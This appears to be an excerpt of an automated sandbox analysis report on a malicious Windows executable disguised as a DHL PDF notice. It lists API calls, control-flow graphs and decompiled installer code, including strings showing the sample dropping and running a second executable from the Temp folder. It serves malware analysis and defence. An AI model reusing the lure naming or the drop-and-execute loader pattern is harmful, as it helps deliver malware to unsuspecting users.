                                                            0x00404484
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040448a
                                                            0x0040445e
                                                            0x00404555
                                                            0x00404561
                                                            0x00404568
                                                            0x00000000
                                                            0x004042b3
                                                            0x004042b3
                                                            0x004042b6
                                                            0x004042e9
                                                            0x004042e9
                                                            0x004042eb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004042eb
                                                            0x004042b8
                                                            0x004042bc
                                                            0x004042c1
                                                            0x004042c3
                                                            0x00000000
                                                            0x00000000
                                                            0x004042d3
                                                            0x004042db
                                                            0x00000000
                                                            0x004042e1
                                                            0x004040e9
                                                            0x004040e9
                                                            0x004040ed
                                                            0x004040f2
                                                            0x00404101
                                                            0x00404101
                                                            0x00404107
                                                            0x0040410e
                                                            0x00404152
                                                            0x00404158
                                                            0x00404171
                                                            0x00404174
                                                            0x00404187
                                                            0x0040418d
                                                            0x00000000
                                                            0x00000000
                                                            0x00404193
                                                            0x0040419e
                                                            0x004041a0
                                                            0x004041a2
                                                            0x004041c1
                                                            0x004041c1
                                                            0x004041c4
                                                            0x004041c9
                                                            0x004041cc
                                                            0x004041dc
                                                            0x004041dd
                                                            0x004041df
                                                            0x00404215
                                                            0x00404225
                                                            0x00000000
                                                            0x00404225
                                                            0x004041e1
                                                            0x004041e7
                                                            0x00404200
                                                            0x00404205
                                                            0x00404207
                                                            0x00000000
                                                            0x00000000
                                                            0x00404209
                                                            0x004041f5
                                                            0x004041f5
                                                            0x004041f7
                                                            0x004041f7
                                                            0x00000000
                                                            0x004041f7
                                                            0x004041ea
                                                            0x004041ef
                                                            0x00000000
                                                            0x004041ef
                                                            0x004041ce
                                                            0x004041d4
                                                            0x00000000
                                                            0x00000000
                                                            0x004041d6
                                                            0x00000000
                                                            0x004041d6
                                                            0x004041c6
                                                            0x00000000
                                                            0x004041c6
                                                            0x004041ac
                                                            0x004041b3
                                                            0x004041b9
                                                            0x004041bb
                                                            0x00404591
                                                            0x00000000
                                                            0x00404591
                                                            0x00000000
                                                            0x004041bb
                                                            0x00404179
                                                            0x00000000
                                                            0x00404181
                                                            0x00404160
                                                            0x00404166
                                                            0x0040456e
                                                            0x0040456e
                                                            0x00404574
                                                            0x00404581
                                                            0x00404587
                                                            0x00404587
                                                            0x00000000
                                                            0x00404110
                                                            0x00404115
                                                            0x00404121
                                                            0x0040412a
                                                            0x0040422b
                                                            0x00000000
                                                            0x00404149
                                                            0x0040414c
                                                            0x00000000
                                                            0x0040414c
                                                            0x0040412a
                                                            0x0040410e

                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                            • ShowWindow.USER32(?), ref: 00404121
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                            • DestroyWindow.USER32 ref: 00404160
                                                            • SetWindowLongW.USER32 ref: 00404179
                                                            • GetDlgItem.USER32 ref: 00404198
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                            • GetDlgItem.USER32 ref: 0040425E
                                                            • GetDlgItem.USER32 ref: 00404268
                                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                            • GetDlgItem.USER32 ref: 00404379
                                                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                            • EnableWindow.USER32(?,?), ref: 004043AC
                                                            • EnableWindow.USER32(?,?), ref: 004043C7
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                            • EnableMenuItem.USER32 ref: 004043E4
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: H7B
                                                            • API String ID: 2475350683-2300413410
                                                            • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                            • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                            C-Code - Quality: 96%
                                                            			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                            0x00403d1d
                                                            0x00403d26
                                                            0x00403d2d
                                                            0x00403d2f
                                                            0x00403d43
                                                            0x00403d55
                                                            0x00403d5e
                                                            0x00403d67
                                                            0x00403d6e
                                                            0x00403d73
                                                            0x00403d7a
                                                            0x00403d8d
                                                            0x00403d8d
                                                            0x00403d98
                                                            0x00403d31
                                                            0x00403d3c
                                                            0x00403d3c
                                                            0x00403d9d
                                                            0x00403da7
                                                            0x00403db0
                                                            0x00403db5
                                                            0x00403dc6
                                                            0x00403e58
                                                            0x00403e60
                                                            0x00403e69
                                                            0x00403e69
                                                            0x00403e7f
                                                            0x00403e85
                                                            0x00403e93
                                                            0x00403f14
                                                            0x00403f1c
                                                            0x00403f26
                                                            0x00403f2b
                                                            0x00403f31
                                                            0x00403fbb
                                                            0x00403fc0
                                                            0x00403fc2
                                                            0x00403fde
                                                            0x00000000
                                                            0x00403fde
                                                            0x00403fc4
                                                            0x00403fca
                                                            0x00403fd2
                                                            0x00403fd2
                                                            0x00000000
                                                            0x00403fca
                                                            0x00403f3f
                                                            0x00403f4a
                                                            0x00403f4f
                                                            0x00403f51
                                                            0x00403f58
                                                            0x00403f58
                                                            0x00403f63
                                                            0x00403f6b
                                                            0x00403f6d
                                                            0x00403f6f
                                                            0x00403f78
                                                            0x00403f7b
                                                            0x00403f81
                                                            0x00403f81
                                                            0x00403fa0
                                                            0x00403fb1
                                                            0x00000000
                                                            0x00403fb6
                                                            0x00403f1e
                                                            0x00403f20
                                                            0x00000000
                                                            0x00403e95
                                                            0x00403e95
                                                            0x00403ea1
                                                            0x00403eab
                                                            0x00403eb1
                                                            0x00403eb6
                                                            0x00403ec5
                                                            0x00403fe3
                                                            0x00403fe3
                                                            0x00000000
                                                            0x00403fe3
                                                            0x00403ed4
                                                            0x00403f0f
                                                            0x00000000
                                                            0x00403f0f
                                                            0x00403dcc
                                                            0x00403dcc
                                                            0x00403dcf
                                                            0x00403dd1
                                                            0x00000000
                                                            0x00000000
                                                            0x00403ddf
                                                            0x00403df1
                                                            0x00403df6
                                                            0x00403dff
                                                            0x00000000
                                                            0x00000000
                                                            0x00403e05
                                                            0x00403e07
                                                            0x00403e14
                                                            0x00403e14
                                                            0x00403e1d
                                                            0x00403e23
                                                            0x00403e4b
                                                            0x00403e53
                                                            0x00000000
                                                            0x00403e35
                                                            0x00403e36
                                                            0x00403e3f
                                                            0x00403e45
                                                            0x00403e46
                                                            0x00000000
                                                            0x00403e46
                                                            0x00403e41
                                                            0x00403e43
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403e43
                                                            0x00403e23

                                                            APIs
                                                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                            • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,?,?,?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74D0FAA0), ref: 00403E18
                                                            • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,?,?,?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                            • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,?,00000000,?), ref: 00403E36
                                                            • LoadImageW.USER32 ref: 00403E7F
                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                            • RegisterClassW.USER32 ref: 00403EBC
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                            • CreateWindowExW.USER32 ref: 00403F09
                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                            • GetClassInfoW.USER32 ref: 00403F6B
                                                            • GetClassInfoW.USER32 ref: 00403F78
                                                            • RegisterClassW.USER32 ref: 00403F81
                                                            • DialogBoxParamW.USER32 ref: 00403FA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                            • API String ID: 1975747703-1328062468
                                                            • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                            • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                            C-Code - Quality: 98%
                                                            			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                            0x004030db
                                                            0x004030de
                                                            0x004030e1
                                                            0x004030fb
                                                            0x00403100
                                                            0x00403113
                                                            0x00403118
                                                            0x0040311e
                                                            0x00000000
                                                            0x00403120
                                                            0x00403131
                                                            0x00403142
                                                            0x00403149
                                                            0x00403151
                                                            0x00403156
                                                            0x00403158
                                                            0x00403243
                                                            0x00403245
                                                            0x00403251
                                                            0x00000000
                                                            0x00000000
                                                            0x0040325a
                                                            0x00403286
                                                            0x0040328b
                                                            0x00403296
                                                            0x00403298
                                                            0x004032a9
                                                            0x004032c4
                                                            0x004032cd
                                                            0x004032d2
                                                            0x004032f1
                                                            0x00403301
                                                            0x00403313
                                                            0x00403318
                                                            0x00403320
                                                            0x0040332d
                                                            0x00403335
                                                            0x0040333a
                                                            0x0040333c
                                                            0x0040333c
                                                            0x00403344
                                                            0x00403344
                                                            0x00403347
                                                            0x00403348
                                                            0x00403348
                                                            0x0040334b
                                                            0x0040334d
                                                            0x0040334d
                                                            0x00403357
                                                            0x00403363
                                                            0x00000000
                                                            0x00403368
                                                            0x00000000
                                                            0x00403320
                                                            0x00000000
                                                            0x004032d4
                                                            0x00403262
                                                            0x00403274
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040315e
                                                            0x00403163
                                                            0x00403168
                                                            0x0040316c
                                                            0x00403173
                                                            0x0040317a
                                                            0x0040317c
                                                            0x0040317c
                                                            0x00403187
                                                            0x004032e0
                                                            0x00403322
                                                            0x00000000
                                                            0x00403322
                                                            0x00403194
                                                            0x00403214
                                                            0x00403218
                                                            0x0040321d
                                                            0x00000000
                                                            0x00403214
                                                            0x0040319d
                                                            0x004031a2
                                                            0x004031aa
                                                            0x004031d0
                                                            0x004031df
                                                            0x004031e5
                                                            0x004031ea
                                                            0x004031f0
                                                            0x00000000
                                                            0x00000000
                                                            0x004031fa
                                                            0x00403202
                                                            0x00403205
                                                            0x0040320a
                                                            0x0040320c
                                                            0x0040320c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004031fa
                                                            0x0040321e
                                                            0x00403224
                                                            0x00403230
                                                            0x00403230
                                                            0x00403233
                                                            0x00403239
                                                            0x00403239
                                                            0x00403241
                                                            0x00000000
                                                            0x00403241

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004030E4
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_Notice_pdf.exe,00000400), ref: 00403100
                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 0040615C
                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Notice_pdf.exe,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 00403149
                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
